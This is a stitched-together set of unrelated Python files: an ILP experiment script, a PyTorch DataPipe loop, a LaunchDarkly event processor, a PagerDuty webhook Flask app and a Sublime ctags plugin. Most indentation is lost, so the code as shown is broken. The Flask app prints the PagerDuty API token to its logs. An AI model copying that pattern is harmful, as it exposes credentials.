settings.name = f'popper'
elif optimistic:
settings.name = f'optimistic'
elif constraints == False:
settings.name = f'dumb'
elif chunking == False:
settings.name = 'no-chunking'
elif lazy == False:
settings.name = 'no-eagerness'
else:
settings.name = f'dcc'
return settings
def train_popper(settings):
if 'iggp' in settings.task:
train_iggp(settings)
elif 'train' in settings.task:
train_trains(settings)
else:
train_lists(settings)
def test_popper(settings):
print(get_time(),f'TEST: task:{settings.task}\t task:{settings.name}\t trial:{settings.trial}')
if 'iggp' in settings.task:
test_iggp(settings)
elif 'train' in settings.task:
test_trains(settings)
else:
test_lists(settings)
test_(settings)
def myround(x):
if x < 1:
x = round(x,1)
if x == 0:
return 0
return x
return int(x)
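# Worked examples: myround(0.04) -> 0, myround(0.37) -> 0.4, myround(12.7) -> 12
# (values below 1 are rounded to one decimal place, larger values are truncated to an int).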
def get_predictions(settings, stuff):
prolog = Prolog()
prolog.consult(settings.ex_file)
prolog.consult(settings.bk_file)
prolog.consult('test.pl')
prolog.consult(f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv')
res = list(prolog.query('get_predictions(S0,S1)'))[0]
stuff['stuff'] = res['S0']+res['S1']
def get_acc_array(task, settings, trial):
with multiprocessing.Manager() as manager:
l = manager.dict()
l['stuff'] = None
p = Process(target=get_predictions, args=(settings, l))
p.start()
p.join()
# print(l['stuff'])
return l['stuff']
def get_accs(task, settings):
path = f'data/{task}/results/'
accs = []
for trial in TRIALS:
fname = f'{path}/{settings.name}-{trial}.csv'
with open(fname) as f:
for line in f:
xs = line.split(',')
if len(xs) > 1:
# print(task, settings.name, line)
tp, fn, tn, fp = int(xs[0]), int(xs[1]), int(xs[2]), int(xs[3])
# print(tp,fn,tn,fp)
# accs.append(tp / (tp+fn))
accs.append((tp + tn) / (tp+fn+tn+fp))
return int(np.mean(accs)*100), int(stats.sem(accs)*100)
def get_time_(task, settings, trial):
settings.task = task
settings.trial = trial
fname = get_prog_file(settings)
with open(fname) as f:
for line in f:
if line.startswith('%time'):
return float(line.split(',')[1])
def get_times(task, settings):
settings.task = task
times = []
for trial in TRIALS:
settings.trial = trial
fname = get_prog_file(settings)
with open(fname) as f:
for line in f:
if line.startswith('%time'):
times.append(float(line.split(',')[1]))
return myround(np.mean(times)), myround(stats.sem(times))
def print_rows(systems, func):
for task in TASKS:
x = '\\tw{' + task + '}'
for system in systems:
value,err = func(task, system)
            x += f' & {value} $\\pm$ {err}'
x+= ' \\\\'
print(x)
# def tests():
# # dcc
# x = get_settings(1, 1)
# # popper
# # y = get_settings(1, 1, baseline=True)
# # no constraints
# # y = get_settings(1, 1, constraints=False)
# # lazy
# # y = get_settings(1, 1, lazy=False)
# # compression
# y = get_settings(1, 1, chunking=False)
# accs = {system:[] for system in [x, y]}
# times = {system:[] for system in [x, y]}
# for system in [x, y]:
# for task in TASKS:
# for trial in TRIALS:
# acc = get_acc_(task, system, trial)
# time = get_time_(task, system, trial)
# accs[system].append(acc)
# times[system].append(time)
# # xs = accs[x]
# # ys = accs[y]
# # McN = math.pow((b-c),2) / (b+c)
# # print(f'accuracies p-value: {1-stats.chi2.cdf(McN,1):.3f}')
# xs = times[x]
# ys = times[y]
# print(xs)
# print(ys)
# res = stats.ttest_rel(xs, ys)
# print(f'times p-value: {res.pvalue:.5f}')
def tests():
# dcc
x = get_settings(1, 1)
# popper
y = get_settings(1, 1, baseline=True)
# no constraints
# y = get_settings(1, 1, constraints=False)
# lazy
# y = get_settings(1, 1, lazy=False)
# compression
# y = get_settings(1, 1, chunking=False)
# TRIALS = [2]
# T
# ACCS
predictions = {system:[] for system in [x, y]}
for settings in [x, y]:
for task in TASKS:
settings.task = task
for trial in TRIALS:
settings.trial = trial
if 'iggp' in task:
test_iggp(settings)
elif 'train' in task:
test_trains(settings)
else:
test_lists(settings)
predictions[settings].extend(get_acc_array(task, settings, trial))
xs = predictions[x]
ys = predictions[y]
print('xs',xs)
print('ys',ys)
b = sum(1.0 for (x, y) in zip(xs, ys) if x == 1 and y == 0)
c = sum(1.0 for (x, y) in zip(xs, ys) if x == 0 and y == 1)
print(b, c)
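    # McNemar's test on the paired predictions: b and c count the discordant cases where
    # the two systems disagree; (b - c)^2 / (b + c) is approximately chi-square distributed
    # with 1 degree of freedom under the null hypothesis that both systems perform equally.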
McN = math.pow((b-c),2) / (b+c)
print(f'accuracies p-value: {1-stats.chi2.cdf(McN,1):.3f}')
# times = {system:[] for system in [x, y]}
# TIMES
# for system in [x, y]:
# for task in TASKS:
# for trial in TRIALS:
# time = get_time_(task, system, trial)
# times[system].append(time)
# xs = times[x]
# ys = times[y]
# print(xs)
# print(ys)
# res = stats.ttest_rel(xs, ys)
# print(f'times p-value: {res.pvalue:.5f}')
def print_results1():
systems = []
# dcc
systems.append(get_settings(1, 1))
# popper
systems.append(get_settings(1, 1, baseline=True))
# aleph
systems.append(get_aleph_settings(1, 1))
# metagol
systems.append(get_metagol_settings(1, 1))
print_rows(systems, get_accs)
print('TIMES'*10)
print_rows(systems, get_times)
def print_results2():
systems = []
# dcc
systems.append(get_settings(1, 1))
# optimistic dcc
systems.append(get_settings(1, 1, optimistic=True))
# dcc without constraints
systems.append(get_settings(1, 1, constraints=False))
# dcc without lazy coverage
systems.append(get_settings(1, 1, lazy=False))
# dcc without chunking
systems.append(get_settings(1, 1, chunking=False))
print_rows(systems, get_accs)
print('TIMES'*10)
print_rows(systems, get_times)
def train_aux(job):
print(get_time(), f'TRAIN {job.name}: task:{job.task}\t trial:{job.trial}')
if job.name == 'metagol':
train_metagol(job)
elif job.name == 'aleph':
train_aleph(job)
else:
train_popper(job)
def do_it(mode):
jobs = []
for trial in TRIALS:
for task in TASKS:
# aleph
jobs.append(get_aleph_settings(task, trial))
# metagol
jobs.append(get_metagol_settings(task, trial))
# popper
jobs.append(get_settings(trial, task, baseline=True))
# dcc
jobs.append(get_settings(trial, task))
# optimistic dcc
jobs.append(get_settings(trial, task, optimistic=True))
# dcc without constraints
jobs.append(get_settings(trial, task, constraints=False))
# dcc without chunking
jobs.append(get_settings(trial, task, chunking=False))
# dcc without lazy coverage
jobs.append(get_settings(trial, task, lazy=False))
if mode == 'train':
partmap(train_aux, jobs)
elif mode == 'test':
print('testing')
partmap(test_popper, jobs)
elif mode == 'results':
print_results1()
print('----------')
print_results2()
if __name__ == '__main__':
# pass
x = sys.argv[1]
if x == 'gen':
gen_train_data()
gen_list_data()
do_it(x)
|
eventloop.py
|
import torch
import threading
import pickle
from torch.utils.data import IterDataPipe, communication, MapDataPipe
def DataPipeToQueuesLoop(source_datapipe, req_queue, res_queue):
if isinstance(source_datapipe, IterDataPipe):
pipe_type = communication.iter
protocol_type = communication.protocol.IterDataPipeQueueProtocolServer
elif isinstance(source_datapipe, MapDataPipe):
pipe_type = communication.map # type: ignore[misc]
protocol_type = communication.protocol.MapDataPipeQueueProtocolServer # type: ignore[assignment]
else:
raise Exception('Only supports IterDataPipe or MapDataPipe, got', source_datapipe)
torch.set_num_threads(1)
for _ in pipe_type.DataPipeBehindQueues(source_datapipe, protocol_type(req_queue, res_queue),
blocking_request_get=True):
pass
def SpawnProcessForDataPipeline(multiprocessing_ctx, datapipe):
req_queue = multiprocessing_ctx.Queue()
res_queue = multiprocessing_ctx.Queue()
process = multiprocessing_ctx.Process(
target=DataPipeToQueuesLoop, args=(datapipe, req_queue, res_queue))
return process, req_queue, res_queue
def SpawnThreadForDataPipeline(datapipe):
r"""
Given a DataPipe, creates a copy of the DataPipe, starts a new Thread with DataPipeToQueuesLoop as target,
and return the process, req_queue, res_queue, thread_local_datapipe.
"""
req_queue = communication.queue.ThreadingQueue()
res_queue = communication.queue.ThreadingQueue()
try:
new_datapipe = pickle.loads(pickle.dumps(datapipe))
except Exception as e:
raise Exception('Unable to pickle DataPipe to make thread local copy', e)
process = threading.Thread(target=DataPipeToQueuesLoop, args=(
new_datapipe, req_queue, res_queue), daemon=True)
return process, req_queue, res_queue, new_datapipe
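# Illustrative sketch: serving a tiny IterDataPipe from a background thread with the
# helper above. _RangePipe and _thread_demo are hypothetical example names; only
# SpawnThreadForDataPipeline and the imports at the top of this module are assumed.
class _RangePipe(IterDataPipe):
    def __init__(self, n):
        self.n = n
    def __iter__(self):
        return iter(range(self.n))
def _thread_demo():
    # The daemon thread runs DataPipeToQueuesLoop and answers requests arriving on
    # req_queue via torch's communication protocol; res_queue carries the replies.
    thread, req_queue, res_queue, local_pipe = SpawnThreadForDataPipeline(_RangePipe(4))
    thread.start()
    return thread, req_queue, res_queue, local_pipe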
|
event_processor.py
|
"""
Implementation details of the analytics event delivery component.
"""
# currently excluded from documentation - see docs/README.md
from calendar import timegm
from collections import namedtuple
from email.utils import parsedate
import errno
import json
from threading import Event, Lock, Thread
import time
import uuid
import queue
import urllib3
from ldclient.event_summarizer import EventSummarizer
from ldclient.fixed_thread_pool import FixedThreadPool
from ldclient.impl.http import _http_factory
from ldclient.impl.repeating_task import RepeatingTask
from ldclient.lru_cache import SimpleLRUCache
from ldclient.user_filter import UserFilter
from ldclient.interfaces import EventProcessor
from ldclient.util import log
from ldclient.util import check_if_error_is_recoverable_and_log, is_http_error_recoverable, stringify_attrs, throw_if_unsuccessful_response, _headers
from ldclient.diagnostics import create_diagnostic_init
__MAX_FLUSH_THREADS__ = 5
__CURRENT_EVENT_SCHEMA__ = 3
__USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__ = [ "key", "secondary", "ip", "country", "email", "firstName", "lastName", "avatar", "name" ]
EventProcessorMessage = namedtuple('EventProcessorMessage', ['type', 'param'])
class EventOutputFormatter:
def __init__(self, config):
self._inline_users = config.inline_users_in_events
self._user_filter = UserFilter(config)
def make_output_events(self, events, summary):
events_out = [ self.make_output_event(e) for e in events ]
if len(summary.counters) > 0:
events_out.append(self.make_summary_event(summary))
return events_out
def make_output_event(self, e):
kind = e['kind']
if kind == 'feature':
is_debug = e.get('debug')
out = {
'kind': 'debug' if is_debug else 'feature',
'creationDate': e['creationDate'],
'key': e['key'],
'version': e.get('version'),
'variation': e.get('variation'),
'value': e.get('value'),
'default': e.get('default'),
'prereqOf': e.get('prereqOf')
}
if self._inline_users or is_debug:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('reason'):
out['reason'] = e.get('reason')
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'identify':
return {
'kind': 'identify',
'creationDate': e['creationDate'],
'key': self._get_userkey(e),
'user': self._process_user(e)
}
elif kind == 'custom':
out = {
'kind': 'custom',
'creationDate': e['creationDate'],
'key': e['key']
}
if self._inline_users:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('data') is not None:
out['data'] = e['data']
if e.get('metricValue') is not None:
out['metricValue'] = e['metricValue']
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'index':
return {
'kind': 'index',
'creationDate': e['creationDate'],
'user': self._process_user(e)
}
else:
return e
"""
Transform summarizer data into the format used for the event payload.
"""
def make_summary_event(self, summary):
flags_out = dict()
for ckey, cval in summary.counters.items():
flag_key, variation, version = ckey
flag_data = flags_out.get(flag_key)
if flag_data is None:
flag_data = { 'default': cval['default'], 'counters': [] }
flags_out[flag_key] = flag_data
counter = {
'count': cval['count'],
'value': cval['value']
}
if variation is not None:
counter['variation'] = variation
if version is None:
counter['unknown'] = True
else:
counter['version'] = version
flag_data['counters'].append(counter)
return {
'kind': 'summary',
'startDate': summary.start_date,
'endDate': summary.end_date,
'features': flags_out
}
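        # Shape of the returned summary event (illustrative values only):
        #   {'kind': 'summary', 'startDate': 1600000000000, 'endDate': 1600000060000,
        #    'features': {'flag-key': {'default': 'off',
        #                              'counters': [{'count': 3, 'value': 'on',
        #                                            'variation': 1, 'version': 7}]}}}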
def _process_user(self, event):
filtered = self._user_filter.filter_user_props(event['user'])
return stringify_attrs(filtered, __USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__)
def _get_userkey(self, event):
return str(event['user'].get('key'))
class EventPayloadSendTask:
def __init__(self, http, config, formatter, payload, response_fn):
self._http = http
self._config = config
self._formatter = formatter
self._payload = payload
self._response_fn = response_fn
def run(self):
try:
output_events = self._formatter.make_output_events(self._payload.events, self._payload.summary)
resp = self._do_send(output_events)
except Exception:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed.',
exc_info=True)
def _do_send(self, output_events):
# noinspection PyBroadException
try:
json_body = json.dumps(output_events)
log.debug('Sending events payload: ' + json_body)
payload_id = str(uuid.uuid4())
r = _post_events_with_retry(
self._http,
self._config,
self._config.events_uri,
payload_id,
json_body,
"%d events" % len(self._payload.events)
)
if r:
self._response_fn(r)
return r
except Exception as e:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed. [%s]', e)
class DiagnosticEventSendTask:
def __init__(self, http, config, event_body):
self._http = http
self._config = config
self._event_body = event_body
def run(self):
# noinspection PyBroadException
try:
json_body = json.dumps(self._event_body)
log.debug('Sending diagnostic event: ' + json_body)
_post_events_with_retry(
self._http,
self._config,
self._config.events_base_uri + '/diagnostic',
None,
json_body,
"diagnostic event"
)
except Exception as e:
log.warning(
'Unhandled exception in event processor. Diagnostic event was not sent. [%s]', e)
FlushPayload = namedtuple('FlushPayload', ['events', 'summary'])
class EventBuffer:
def __init__(self, capacity):
self._capacity = capacity
self._events = []
self._summarizer = EventSummarizer()
self._exceeded_capacity = False
self._dropped_events = 0
def add_event(self, event):
if len(self._events) >= self._capacity:
self._dropped_events += 1
if not self._exceeded_capacity:
log.warning("Exceeded event queue capacity. Increase capacity to avoid dropping events.")
self._exceeded_capacity = True
else:
self._events.append(event)
self._exceeded_capacity = False
def add_to_summary(self, event):
self._summarizer.summarize_event(event)
def get_and_clear_dropped_count(self):
dropped_count = self._dropped_events
self._dropped_events = 0
return dropped_count
def get_payload(self):
return FlushPayload(self._events, self._summarizer.snapshot())
def clear(self):
self._events = []
self._summarizer.clear()
class EventDispatcher:
def __init__(self, inbox, config, http_client, diagnostic_accumulator=None):
self._inbox = inbox
self._config = config
self._http = _http_factory(config).create_pool_manager(1, config.events_uri) if http_client is None else http_client
self._close_http = (http_client is None) # so we know whether to close it later
self._disabled = False
self._outbox = EventBuffer(config.events_max_pending)
self._user_keys = SimpleLRUCache(config.user_keys_capacity)
self._formatter = EventOutputFormatter(config)
self._last_known_past_time = 0
self._deduplicated_users = 0
self._diagnostic_accumulator = None if config.diagnostic_opt_out else diagnostic_accumulator
self._flush_workers = FixedThreadPool(__MAX_FLUSH_THREADS__, "ldclient.flush")
self._diagnostic_flush_workers = None if self._diagnostic_accumulator is None else FixedThreadPool(1, "ldclient.diag_flush")
if self._diagnostic_accumulator is not None:
init_event = create_diagnostic_init(self._diagnostic_accumulator.data_since_date,
self._diagnostic_accumulator.diagnostic_id,
config)
task = DiagnosticEventSendTask(self._http, self._config, init_event)
self._diagnostic_flush_workers.execute(task.run)
self._main_thread = Thread(target=self._run_main_loop)
self._main_thread.daemon = True
self._main_thread.start()
def _run_main_loop(self):
log.info("Starting event processor")
while True:
try:
message = self._inbox.get(block=True)
if message.type == 'event':
self._process_event(message.param)
elif message.type == 'flush':
self._trigger_flush()
elif message.type == 'flush_users':
self._user_keys.clear()
elif message.type == 'diagnostic':
self._send_and_reset_diagnostics()
elif message.type == 'test_sync':
self._flush_workers.wait()
if self._diagnostic_accumulator is not None:
self._diagnostic_flush_workers.wait()
message.param.set()
elif message.type == 'stop':
self._do_shutdown()
message.param.set()
return
except Exception:
log.error('Unhandled exception in event processor', exc_info=True)
def _process_event(self, event):
if self._disabled:
return
# Always record the event in the summarizer.
self._outbox.add_to_summary(event)
# Decide whether to add the event to the payload. Feature events may be added twice, once for
# the event (if tracked) and once for debugging.
add_full_event = False
add_debug_event = False
add_index_event = False
if event['kind'] == "feature":
add_full_event = event.get('trackEvents')
add_debug_event = self._should_debug_event(event)
else:
add_full_event = True
# For each user we haven't seen before, we add an index event - unless this is already
# an identify event for that user.
if not (add_full_event and self._config.inline_users_in_events):
user = event.get('user')
if user and 'key' in user:
is_index_event = event['kind'] == 'identify'
already_seen = self.notice_user(user)
add_index_event = not is_index_event and not already_seen
if not is_index_event and already_seen:
self._deduplicated_users += 1
if add_index_event:
ie = { 'kind': 'index', 'creationDate': event['creationDate'], 'user': user }
self._outbox.add_event(ie)
if add_full_event:
self._outbox.add_event(event)
if add_debug_event:
debug_event = event.copy()
debug_event['debug'] = True
self._outbox.add_event(debug_event)
# Add to the set of users we've noticed, and return true if the user was already known to us.
def notice_user(self, user):
if user is None or 'key' not in user:
return False
key = user['key']
return self._user_keys.put(key, True)
def _should_debug_event(self, event):
debug_until = event.get('debugEventsUntilDate')
if debug_until is not None:
last_past = self._last_known_past_time
now = int(time.time() * 1000)
if debug_until > last_past and debug_until > now:
return True
return False
def _trigger_flush(self):
if self._disabled:
return
payload = self._outbox.get_payload()
if self._diagnostic_accumulator:
self._diagnostic_accumulator.record_events_in_batch(len(payload.events))
if len(payload.events) > 0 or len(payload.summary.counters) > 0:
task = EventPayloadSendTask(self._http, self._config, self._formatter, payload,
self._handle_response)
if self._flush_workers.execute(task.run):
# The events have been handed off to a flush worker; clear them from our buffer.
self._outbox.clear()
else:
# We're already at our limit of concurrent flushes; leave the events in the buffer.
pass
def _handle_response(self, r):
server_date_str = r.getheader('Date')
if server_date_str is not None:
server_date = parsedate(server_date_str)
if server_date is not None:
timestamp = int(timegm(server_date) * 1000)
self._last_known_past_time = timestamp
if r.status > 299 and not is_http_error_recoverable(r.status):
self._disabled = True
return
def _send_and_reset_diagnostics(self):
if self._diagnostic_accumulator is not None:
dropped_event_count = self._outbox.get_and_clear_dropped_count()
stats_event = self._diagnostic_accumulator.create_event_and_reset(dropped_event_count, self._deduplicated_users)
self._deduplicated_users = 0
task = DiagnosticEventSendTask(self._http, self._config, stats_event)
self._diagnostic_flush_workers.execute(task.run)
def _do_shutdown(self):
self._flush_workers.stop()
self._flush_workers.wait()
if self._close_http:
self._http.clear()
class DefaultEventProcessor(EventProcessor):
def __init__(self, config, http=None, dispatcher_class=None, diagnostic_accumulator=None):
self._inbox = queue.Queue(config.events_max_pending)
self._inbox_full = False
self._flush_timer = RepeatingTask(config.flush_interval, config.flush_interval, self.flush)
self._users_flush_timer = RepeatingTask(config.user_keys_flush_interval, config.user_keys_flush_interval, self._flush_users)
self._flush_timer.start()
self._users_flush_timer.start()
if diagnostic_accumulator is not None:
self._diagnostic_event_timer = RepeatingTask(config.diagnostic_recording_interval,
config.diagnostic_recording_interval, self._send_diagnostic)
self._diagnostic_event_timer.start()
else:
self._diagnostic_event_timer = None
self._close_lock = Lock()
self._closed = False
(dispatcher_class or EventDispatcher)(self._inbox, config, http, diagnostic_accumulator)
def send_event(self, event):
event['creationDate'] = int(time.time() * 1000)
self._post_to_inbox(EventProcessorMessage('event', event))
def flush(self):
self._post_to_inbox(EventProcessorMessage('flush', None))
def stop(self):
with self._close_lock:
if self._closed:
return
self._closed = True
self._flush_timer.stop()
self._users_flush_timer.stop()
if self._diagnostic_event_timer:
self._diagnostic_event_timer.stop()
self.flush()
# Note that here we are not calling _post_to_inbox, because we *do* want to wait if the inbox
# is full; an orderly shutdown can't happen unless these messages are received.
self._post_message_and_wait('stop')
def _post_to_inbox(self, message):
try:
self._inbox.put(message, block=False)
except queue.Full:
if not self._inbox_full:
# possible race condition here, but it's of no real consequence - we'd just get an extra log line
self._inbox_full = True
log.warning("Events are being produced faster than they can be processed; some events will be dropped")
def _flush_users(self):
self._inbox.put(EventProcessorMessage('flush_users', None))
def _send_diagnostic(self):
self._inbox.put(EventProcessorMessage('diagnostic', None))
# Used only in tests
def _wait_until_inactive(self):
self._post_message_and_wait('test_sync')
def _post_message_and_wait(self, type):
reply = Event()
self._inbox.put(EventProcessorMessage(type, reply))
reply.wait()
# These magic methods allow use of the "with" block in tests
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.stop()
def _post_events_with_retry(
http_client,
config,
uri,
payload_id,
body,
events_description
):
hdrs = _headers(config)
hdrs['Content-Type'] = 'application/json'
if payload_id:
hdrs['X-LaunchDarkly-Event-Schema'] = str(__CURRENT_EVENT_SCHEMA__)
hdrs['X-LaunchDarkly-Payload-ID'] = payload_id
can_retry = True
context = "posting %s" % events_description
while True:
next_action_message = "will retry" if can_retry else "some events were dropped"
try:
r = http_client.request(
'POST',
uri,
headers=hdrs,
body=body,
timeout=urllib3.Timeout(connect=config.http.connect_timeout, read=config.http.read_timeout),
retries=0
)
if r.status < 300:
return r
recoverable = check_if_error_is_recoverable_and_log(context, r.status, None, next_action_message)
if not recoverable:
return r
except Exception as e:
check_if_error_is_recoverable_and_log(context, None, str(e), next_action_message)
if not can_retry:
return None
can_retry = False
# fixed delay of 1 second for event retries
time.sleep(1)
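# Minimal usage sketch, assuming only the classes defined in this module: exercise
# EventBuffer on its own. The event dicts below are made-up examples.
if __name__ == '__main__':
    buf = EventBuffer(capacity=2)
    for i in range(3):
        buf.add_event({'kind': 'custom', 'creationDate': i, 'key': 'example-key'})
    payload = buf.get_payload()
    print('buffered events:', len(payload.events))               # 2, capacity reached
    print('dropped events:', buf.get_and_clear_dropped_count())  # 1
    buf.clear()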
|
app.py
|
import sys
import os
from flask import Flask, request, render_template, url_for, redirect, session, Response
import json
import requests
import traceback
import time
from threading import Thread
import uuid
import pd
# import http.client as http_client
# http_client.HTTPConnection.debuglevel = 1
app = Flask(__name__)
app.secret_key = os.environ.get('FLASK_SECRET_KEY') or os.urandom(20)
def process_alerts(token, from_email, incident_id, new_incident_id):
incident_alerts = pd.fetch(api_key=token, endpoint=f"incidents/{incident_id}/alerts")
for alert in incident_alerts:
alert_id = alert["id"]
move_alert(token, from_email, incident_id, alert_id, new_incident_id)
def move_alert(token, from_email, incident_id, alert_id, new_incident_id):
alert_add_data = {
"alert": {
"type": "alert",
"incident": {
"type": "incident_reference",
"id": new_incident_id
}
}
}
alert_add_result = pd.request(
api_key=token,
endpoint=f"incidents/{incident_id}/alerts/{alert_id}",
method="PUT",
data=alert_add_data,
addheaders={"From": from_email}
)
# print(alert_add_result)
def email_for_user_id(token, user_id):
user = pd.request(api_key=token, endpoint=f"users/{user_id}")
return user['user']['email']
def process_notes(token, incident_id, new_incident_id):
incident_notes = pd.fetch(api_key=token, endpoint=f"incidents/{incident_id}/notes")
incident_notes.reverse()
for note in incident_notes:
note_add_data = {
"note": {
"content": f"{note['content']} ({note['created_at']})"
}
}
note_add_result = pd.request(
api_key=token,
endpoint=f"incidents/{new_incident_id}/notes",
method="POST",
data=note_add_data,
addheaders={"From": email_for_user_id(token, note["user"]["id"])}
)
# print(note_add_result)
@app.route('/copyincident', methods=['POST'])
def copyincident():
token = request.args.get('token')
    if token is None:
        print("no token in request")
        return "ok"
    body = request.get_json()
    if body is None:
        print("no JSON body")
        return "ok"
try:
incident_url = body["messages"][0]["incident"]["html_url"]
message = body["messages"][0]
event = message['event']
if event != 'incident.custom':
print(f"Event is {event}, doing nothing")
return "ok"
user_id = message['log_entries'][0]['agent']['id']
user = pd.request(api_key=token, endpoint=f"users/{user_id}")
from_email = user['user']['email']
incident_id = message['incident']['id']
incident = pd.request(api_key=token, endpoint=f"incidents/{incident_id}")
del incident["incident"]["id"]
incident["incident"]["status"] = "triggered"
incident["incident"]["title"] = f"Copy of {incident['incident']['title']}"
del incident["incident"]["assignments"]
del incident["incident"]["incident_key"]
incident_post_result = pd.request(api_key=token, endpoint="incidents", method="POST", data=incident, addheaders={"From": from_email})
new_incident_id = incident_post_result["incident"]["id"]
print(f"Copied incident {incident_url} to {new_incident_id}")
alerts_thread = Thread(target=process_alerts, args=(token, from_email, incident_id, new_incident_id))
alerts_thread.start()
print(f"started thread for incident alerts on {new_incident_id}")
notes_thread = Thread(target=process_notes, args=(token, incident_id, new_incident_id))
notes_thread.start()
print(f"started thread for incident notes on {new_incident_id}")
except Exception as e:
traceback.print_exc()
r = "ok"
return r
def merge_new_incident(token, user_id, service_id, incident_id, integration_id):
print(f"hi merge new incident {token} {user_id} {service_id} {incident_id}")
integration = pd.request(api_key=token, endpoint=f"services/{service_id}/integrations/{integration_id}")
integration_key = integration["integration"]["integration_key"]
print(f"integration key is {integration_key}")
user = pd.request(api_key=token, endpoint=f"users/{user_id}")
from_email = user['user']['email']
print(f"from email is {from_email}")
new_dedup_key = str(uuid.uuid4())
alert_body = {
"event_action": "trigger",
"routing_key": integration_key,
"dedup_key": new_dedup_key,
"payload": {
"summary": f"keepalive for {incident_id}",
"source": "PDkeepincident",
"severity": "info"
}
}
print("sending alert")
r = requests.post('https://events.pagerduty.com/v2/enqueue', json=alert_body)
print(r.json())
tries = 0
time.sleep(1)
r = pd.request(api_key=token, endpoint='incidents', params={'incident_key': new_dedup_key})
    while (r.get("incidents") is None or len(r["incidents"]) < 1) and tries < 30:
        print("no incident yet; sleeping...")
tries += 1
time.sleep(1)
r = pd.request(api_key=token, endpoint='incidents', params={'incident_key': new_dedup_key})
new_incident_id = r["incidents"][0]["id"]
print(f"new incident id is {new_incident_id}")
merge_body = {
"source_incidents": [
{
"id": new_incident_id,
"type": "incident_reference"
}
]
}
r = pd.request(api_key=token, endpoint=f"incidents/{incident_id}/merge", method="PUT", addheaders={"From": from_email}, data=merge_body)
print(r)
@app.route('/keepincident', methods=['POST'])
def keepincident():
token = request.args.get('token')
    if token is None:
        print("no token in request")
        return "ok"
    body = request.get_json()
    if body is None:
        print("no JSON body")
        return "ok"
try:
message = body["messages"][0]
event = message['event']
if event != 'incident.custom':
print(f"Event is {event}, doing nothing")
return "ok"
incident_url = message["incident"]["html_url"]
incident_id = message["incident"]["id"]
incident_status = message["incident"]["status"]
if incident_status == 'resolved':
print(f"incident {incident_id} is resolved, can't do anything")
return "ok"
user_id = message['log_entries'][0]['agent']['id']
service_id = message["incident"]["service"]["id"]
integration_id = None
integrations = message["incident"]["service"]["integrations"]
for integration in integrations:
if integration["type"] == "events_api_v2_inbound_integration_reference":
integration_id = integration["id"]
break
        if integration_id is None:
print(f"No v2 integration for incident {incident_id} in service {service_id}")
return "ok"
merge_thread = Thread(target=merge_new_incident, args=(token, user_id, service_id, incident_id, integration_id))
merge_thread.start()
print(f"started thread for merge new incident {incident_id}")
except Exception as e:
traceback.print_exc()
r = "ok"
return r
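# Local-run sketch: the webhook routes above are normally served behind a WSGI
# server; for quick manual testing something like this works (host and port are
# arbitrary example values).
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)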
|
ctagsplugin.py
|
"""
A ctags plugin for Sublime Text 2/3.
"""
import functools
from functools import reduce
import codecs
import locale
import sys
import os
import pprint
import re
import string
import threading
import subprocess
from itertools import chain
from operator import itemgetter as iget
from collections import defaultdict, deque
try:
import sublime
import sublime_plugin
from sublime import status_message, error_message
# hack the system path to prevent the following issue in ST3
# ImportError: No module named 'ctags'
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
except ImportError: # running tests
from tests.sublime_fake import sublime
from tests.sublime_fake import sublime_plugin
sys.modules['sublime'] = sublime
sys.modules['sublime_plugin'] = sublime_plugin
import ctags
from ctags import (FILENAME, parse_tag_lines, PATH_ORDER, SYMBOL,
TagElements, TagFile)
from helpers.edit import Edit
from helpers.common import *
from ranking.rank import RankMgr
from ranking.parse import Parser
#
# Constants
#
OBJECT_PUNCTUATORS = {
'class': '.',
'struct': '::',
'function': '/',
}
ENTITY_SCOPE = 'entity.name.function, entity.name.type, meta.toc-list'
RUBY_SPECIAL_ENDINGS = r'\?|!'
ON_LOAD = sublime_plugin.all_callbacks['on_load']
#
# Functions
#
def select(view, region):
sel_set = view.sel()
sel_set.clear()
sel_set.add(region)
sublime.set_timeout(functools.partial(view.show_at_center, region), 1)
def in_main(f):
@functools.wraps(f)
def done_in_main(*args, **kw):
sublime.set_timeout(functools.partial(f, *args, **kw), 0)
return done_in_main
# TODO: allow thread per tag file. That makes more sense.
def threaded(finish=None, msg='Thread already running'):
def decorator(func):
func.running = 0
@functools.wraps(func)
def threaded(*args, **kwargs):
def run():
try:
result = func(*args, **kwargs)
if result is None:
result = ()
elif not isinstance(result, tuple):
result = (result, )
if finish:
sublime.set_timeout(
functools.partial(finish, args[0], *result), 0)
finally:
func.running = 0
if not func.running:
func.running = 1
t = threading.Thread(target=run)
t.setDaemon(True)
t.start()
else:
status_message(msg)
threaded.func = func
return threaded
return decorator
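# Usage sketch for the decorator above; ``slow_reindex`` and its body are
# hypothetical. ``finish`` is called back on the main thread with the worker's
# return value, and invoking the command again while a run is in progress only
# shows ``msg`` in the status bar.
#   @threaded(finish=lambda self, count: status_message('%d paths indexed' % count),
#             msg='Indexing already in progress')
#   def slow_reindex(self, paths):
#       return len(paths)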
def on_load(path=None, window=None, encoded_row_col=True, begin_edit=False):
"""
Decorator to open or switch to a file.
Opens and calls the "decorated function" for the file specified by path,
or the current file if no path is specified. In the case of the former, if
the file is open in another tab that tab will gain focus, otherwise the
file will be opened in a new tab with a requisite delay to allow the file
to open. In the latter case, the "decorated function" will be called on
the currently open file.
:param path: path to a file
:param window: the window to open the file in
:param encoded_row_col: the ``sublime.ENCODED_POSITION`` flag for
``sublime.Window.open_file``
:param begin_edit: if editing the file being opened
:returns: None
"""
window = window or sublime.active_window()
def wrapper(f):
# if no path, tag is in current open file, return that
if not path:
return f(window.active_view())
# else, open the relevant file
view = window.open_file(os.path.normpath(path), encoded_row_col)
def wrapped():
# if editing the open file
if begin_edit:
with Edit(view):
f(view)
else:
f(view)
# if buffer is still loading, wait for it to complete then proceed
if view.is_loading():
class set_on_load():
callbacks = ON_LOAD
def __init__(self):
# append self to callbacks
self.callbacks.append(self)
def remove(self):
# remove self from callbacks, hence disconnecting it
self.callbacks.remove(self)
def on_load(self, view):
# on file loading
try:
wrapped()
finally:
# disconnect callback
